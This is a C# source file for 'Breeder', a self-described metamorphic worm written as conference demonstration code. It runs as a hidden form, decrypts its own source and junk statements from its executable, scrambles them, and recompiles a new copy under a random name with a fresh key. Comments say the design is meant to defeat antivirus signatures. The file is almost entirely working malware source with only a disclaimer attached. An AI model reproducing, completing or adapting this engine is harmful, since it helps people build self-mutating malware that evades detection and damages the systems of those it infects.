using System;
using System.IO;
using System.Data;
using System.Text;
using System.Collections;
using System.Windows.Forms;
using System.Security.Cryptography;
using System.Collections.Specialized;
using Microsoft.CSharp;

public class Breeder : System.Windows.Forms.Form
{
	/*
	 * ========================================================================================
	 * Title	: Stealth virus design thru breeding concept (Complete metamorphism)
	 * Purpose	: Conceptual code for demonstration at Hack In The Box Security Conference 2004
	 * Module	: Breeder v1.0
	 * Ability	: Complete metamorphism in each infection
	 * Type		: Worm
	 * Author	: Teo Sze Siong
	 * E-mail	: ss_teo2002@yahoo.com
	 * ========================================================================================
	 * Metamorphic coding guideline
	 * ----------------------------
	 * 1. Prevent using constants as possible
	 * 2. Prevent using chained method calls as possible
	 * 3. Strive for randomness in algorithm, not efficiency
	 * 4. Break statements into smallest and shortest as possible
	 * 5. Filter and repack the new mixture of source code and junk statements
	 * 6. Randomize the sequence of stored junk statements and encrypt it back
	 * 7. Obfuscate methods' name, method parameters and global objects' name before compile
	 * ========================================================================================
	 * DISCLAIMER: I shall not hold any responsible towards the misuse of this code by anyone
	 * ========================================================================================
	 */

	private Random randomizer = new Random();
	private System.ComponentModel.Container components = null;

	public Breeder()
	{
		this.Opacity = 0;
		this.Name = "Breeder";
		this.Load += new System.EventHandler(this.Breeder_Load);
	}

	//	Overrides super-class Dispose method
	protected override void Dispose( bool disposing )
	{
		if( disposing )
		{
			if (components != null) 
			{
				components.Dispose();
			}
		}
		base.Dispose( disposing );
	}

	[MTAThread]
	static void Main() 
	{
		Application.Run(new Breeder());
	}

	//	Append data to target file
	private void AppendDataToFile( string file, string data )
	{
		FileStream fs = new FileStream( file, FileMode.OpenOrCreate, FileAccess.Write, FileShare.None );
		BinaryWriter writer = new BinaryWriter( fs );
		fs.Position = fs.Length;
		byte[] bytes = new byte[data.Length];

		for( int count = 0; count < data.Length; count++ )
		{
			bytes[count] = ( byte )data[count];
		}

		writer.Write( bytes );
		writer.Close();
		fs.Close();
	}

	//	Metamorphic code startup
	private void Breeder_Load(object sender, System.EventArgs e)
	{
		//	Get the polymorphic symmetric encryption/decryption key
		string md5Key = GetPolymorphicKey();

		//	Load encrypted junk code into a string array
		string jCode = GetJunkCode();
		jCode = Decrypt( md5Key, jCode );
		string[] junkCodes = jCode.Split( '\n' );

		//	Load encrypted source code into a string array and remove junk codes from it
		string srcCode = GetSourceCode();
		srcCode = Decrypt( md5Key, srcCode );
		FilterEngine( ref srcCode, junkCodes );
		string[] sourceCode = srcCode.Split( '\n' );

		//	Prepare queue for use as a container to mix original source codes and junk statements
		Queue buffer = new Queue();

		//	Checks whether code position is inside a method, randomly insert junk statements if true
		foreach( string line in sourceCode )
		{
			buffer.Enqueue( line );
			bool isInsideAMethod = true;

			//	-------------------------------------------------------------------------------------
			//	Use separate 'if' statetement to help random code insertion achieve high metamorphism
			//	-------------------------------------------------------------------------------------

			//	Check line position for the current code, set the flag to false if outside a method
			if( line.IndexOf( "for" ) > -1 ) isInsideAMethod = false;
			//;
			if( line.IndexOf( "using" ) > -1 ) isInsideAMethod = false;
			//;
			if( line.IndexOf( "return" ) > -1 ) isInsideAMethod = false;
			//;
			if( line.IndexOf( "public" ) > -1 ) isInsideAMethod = false;
			//;
			if( line.IndexOf( "private" ) > -1 ) isInsideAMethod = false;
			//;
			if( line.IndexOf( "protected" ) > -1 ) isInsideAMethod = false;
			//;
			if( line.IndexOf( "Application.Run" ) > -1 ) isInsideAMethod = false;
			//;
			if( line.IndexOf( "}" ) > -1 ) isInsideAMethod = false;
			//;
			if( line.IndexOf( ";" ) < 0 ) isInsideAMethod = false;
			//;

			//	If line position of current code is inside a method, randomly insert junk statement(s)
			if( isInsideAMethod ) InsertRandomJunkCode( ref buffer, junkCodes );
			//;
		}

		//	Copies the mixture of source code and junk code into a string array
		string[] newBreed = new string[buffer.Count];
		buffer.CopyTo( newBreed, 0 );

		//	Generate a random filename
		string filename = GetRandomName();
		filename += Path.GetExtension( Application.ExecutablePath );

		//	Mutate current symmetric encryption/decryption key
		string newMd5Key = GetRandomKey();

		//	Randomize the sequence of junk statements then encrypt it back
		RandomizeSequence( ref junkCodes );
		jCode = StringArrayToString( junkCodes );
		jCode = Encrypt( newMd5Key, jCode );

		//	Encrypt the mixture of junk statements and source code
		srcCode = StringArrayToString( newBreed );
		srcCode = Encrypt( newMd5Key, srcCode );

		//	Obtain junk code length and source code length in string of 3 characters for each
		string jcLength = GetLengthIn3CharString( jCode.Length );
		string srccLength = GetLengthIn3CharString( srcCode.Length );

		//	Reproduce new breed of metamorphic worm
		Reborn( newBreed, filename );

		//	Append mutated polymorphic key, junk codes and source code to the new worm executable
		string nucleus = newMd5Key + jCode + srcCode + jcLength + srccLength;
		AppendDataToFile( filename, nucleus );

		Close();
	}

	//	Filters previously mixed junk code
	private void FilterEngine( ref string code, string[] junkCodes )
	{
		foreach( string jCode in junkCodes )
		{
			code = code.Replace( jCode + '\n', "" );
		}
	}

	//	Inserts random amount of junk codes into queue list
	private void InsertRandomJunkCode( ref Queue list, string[] junkCodes )
	{
		int randomIndex = randomizer.Next( 0, 3 );
        
		for( int count = 0; count < randomIndex; count++ )
		{
			list.Enqueue( junkCodes[randomizer.Next( 0, junkCodes.Length )] );
		}
	}

	//	Randomize the elements sequence in a string array
	private void RandomizeSequence( ref string[] array )
	{
		for( int count = 0; count < array.Length; count++ )
		{
			int targetLocation = randomizer.Next( array.Length );
			Swap( ref array, count, targetLocation );
		}
	}

	//	Reproduce a new breed from unencrypted data structure
	private void Reborn( string[] codeLines, string outputFile )
	{
		string[] srcCodes = new string[] { StringArrayToString( codeLines ) };
		//;
		string[] srcNames = new string[] { GetRandomName() };
		//;
		string[] referAsm = new string[5];

		referAsm[0] = "cscompmgd.dll";
		referAsm[1] = "System.dll";
		referAsm[2] = "System.Data.dll";
		referAsm[3] = "System.Drawing.dll";
		referAsm[4] = "System.Windows.Forms.dll";

		ListDictionary options = new ListDictionary();
		options.Add( "target", "winexe" );
		Compiler.Compile( srcCodes, srcNames, outputFile, referAsm, options );
	}
	//	Swap the position of two elements in a string array
	private void Swap( ref string[] array, int firstPosition, int secondPosition )
	{
		string tmp = array[ firstPosition ];
		array[ firstPosition ] = array[ secondPosition ];
		array[ secondPosition ] = tmp;
	}

	//	Converts from string to unsigned int array
	private uint[] StringToUIntArray( string data )
	{
		uint[] output = new uint[data.Length];

		for( int count = 0; count < data.Length; count++ )
		{
			output[count] = ( uint )data[count];
		}

		return output;
	}
	//	Obtain the length for the stored encrypted junk code
	private int GetJunkCodeLength()
	{
		string jcLength = ReadDataFromOwnBody( GetOwnBodyLength() - 6, 3 );

		return GetLengthFrom3CharString( jcLength );
	}

	//	Convert the length with maximum of 256^3 from string into a integer
	private int GetLengthFrom3CharString( string length )
	{
		int firstByte = length[0];
		int secondByte = length[1];
		int thirdByte = length[2];

		return thirdByte * 65536 + secondByte * 256 + firstByte;
	}

	//	Obtain the length for the stored encrypted source code
	private int GetSourceCodeLength()
	{
		string srccLength = ReadDataFromOwnBody( GetOwnBodyLength() - 3, 3 );

		return GetLengthFrom3CharString( srccLength );
	}

	//	Get own body length
	private long GetOwnBodyLength()
	{
		FileStream fs = new FileStream( Application.ExecutablePath, FileMode.Open, FileAccess.Read );
		long length = fs.Length;
		fs.Close();

		return length;
	}

	//	Encrypt a string with a symmetric key
	private string Encrypt( string key, string targetData )
	{
		uint[] output = new uint[targetData.Length];
		uint[] secretKey = StringToUIntArray( key );
		uint[] data = StringToUIntArray( targetData );

		for( int count = 0; count < data.Length; count++ )
		{
			output[count] = data[count] + secretKey[count % secretKey.Length];

			if( output[count] > 255 )
			{
				output[count] -= 256;
			}
		}

		return UIntArrayToString( output );
	}

	//	Decrypt a string with a symmetric key
	private string Decrypt( string key, string targetData )
	{
		uint[] output = new uint[targetData.Length];
		uint[] secretKey = StringToUIntArray( key );
		uint[] data = StringToUIntArray( targetData );

		for( int count = 0; count < data.Length; count++ )
		{
			output[count] = data[count] - secretKey[count % secretKey.Length];

			if( output[count] < 0 )
			{
				output[count] += 256;
			}
		}

		return UIntArrayToString( output );
	}

	//	Obtain junk codes in string array
	private string GetJunkCode()
	{
		int jcLength = GetJunkCodeLength();
		int keyStartPosition = ( int )GetOwnBodyLength() - ( jcLength + GetSourceCodeLength() + 6 );

		return ReadDataFromOwnBody( keyStartPosition, jcLength );
	}

	//	Convert the length with maximum of 256^3 from integer into a string
	private string GetLengthIn3CharString( int length )
	{
		char firstByte = ( char )( length % 256 );
		char secondByte = ( char )( ( ( length - firstByte ) / 256 ) % 256 );
		char thirdByte =  ( char )( ( ( ( length - firstByte ) / 256 ) - secondByte ) / 256 );
		string output = firstByte.ToString() + secondByte.ToString() + thirdByte.ToString();

		return output;
	}

	//	Obtain the polymorphic key
	private string GetPolymorphicKey()
	{
		int keyStartPosition = ( int )GetOwnBodyLength() - ( GetSourceCodeLength() + GetJunkCodeLength() + 38 );

		return ReadDataFromOwnBody( keyStartPosition, 32 );
	}

	//	Get a randomize MD5 key
	private string GetRandomKey()
	{
		/*	NOTE: Prevent using long method-chaining call such as below in metaphoric virus design to prevent
		 *	from being used a detection signature by the antivirus researchers. Break into smaller statements
		 *	so that random insertion of junk statements can help to achieve higher level of metamorphism.
		 * 
		 * 	=================================================================================================
		 * 	return BitConverter.ToString
		 * 		( new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash
		 * 		( new System.Text.UTF8Encoding().GetBytes( randomizer.NextDouble().ToString() ) )
		 * 		).Replace( "-", "" ).ToLower();
		 * 	=================================================================================================
		 */

		UTF8Encoding encoder = new UTF8Encoding();
		MD5CryptoServiceProvider hasher = new MD5CryptoServiceProvider();

		double randomNo = randomizer.NextDouble();
		string rnoStr = randomNo.ToString();
		byte[] tmp = encoder.GetBytes( rnoStr );
		tmp = hasher.ComputeHash( tmp );
		string tmpStr = BitConverter.ToString( tmp );
		tmpStr = tmpStr.Replace( "-", "" );
		tmpStr = tmpStr.ToLower();

		return tmpStr;
	}
	//	Get a randomize name[a-z] with randomize length[5-20]
	private string GetRandomName()
	{
		string key = "";

		for( int count = 0; count < randomizer.Next( 5, 21 ); count++ )
		{
			key += ( char )randomizer.Next( 97, 123 );
		}

		return key;
	}

	//	Obtain encrypted source procedures
	private string GetSourceCode()
	{
		int srccLength = GetSourceCodeLength();
		int keyStartPosition = ( int )GetOwnBodyLength() - ( srccLength + 6 );

		return ReadDataFromOwnBody( keyStartPosition, srccLength );
	}

	//	Read data from own
	private string ReadDataFromOwnBody( long startPosition, int bytesToRead )
	{
		FileStream fs = new FileStream( Application.ExecutablePath, FileMode.Open, FileAccess.Read );
		BinaryReader reader = new BinaryReader( fs );
		string output = "";

		fs.Position = startPosition;
		byte[] data = reader.ReadBytes( bytesToRead );
		reader.Close();
		fs.Close();

		foreach( byte character in data )
		{
			output += ( char )character;
		}

		return output;
	}

	//	Concatenate strings in an array into a single string by chaining them with a marker character
	private string StringArrayToString( string[] stringArray )
	{
		string tmp = stringArray[0];

		for( int count = 1; count < stringArray.Length; count++ )
		{
			tmp += '\n' + stringArray[count];
		}

		return tmp;
	}

	//	Converts from unsigned int array to string
	private string UIntArrayToString( uint[] data )
	{
		string output = "";

		foreach( uint character in data )
		{
			output += ( char )character;
		}

		return output;
	}
}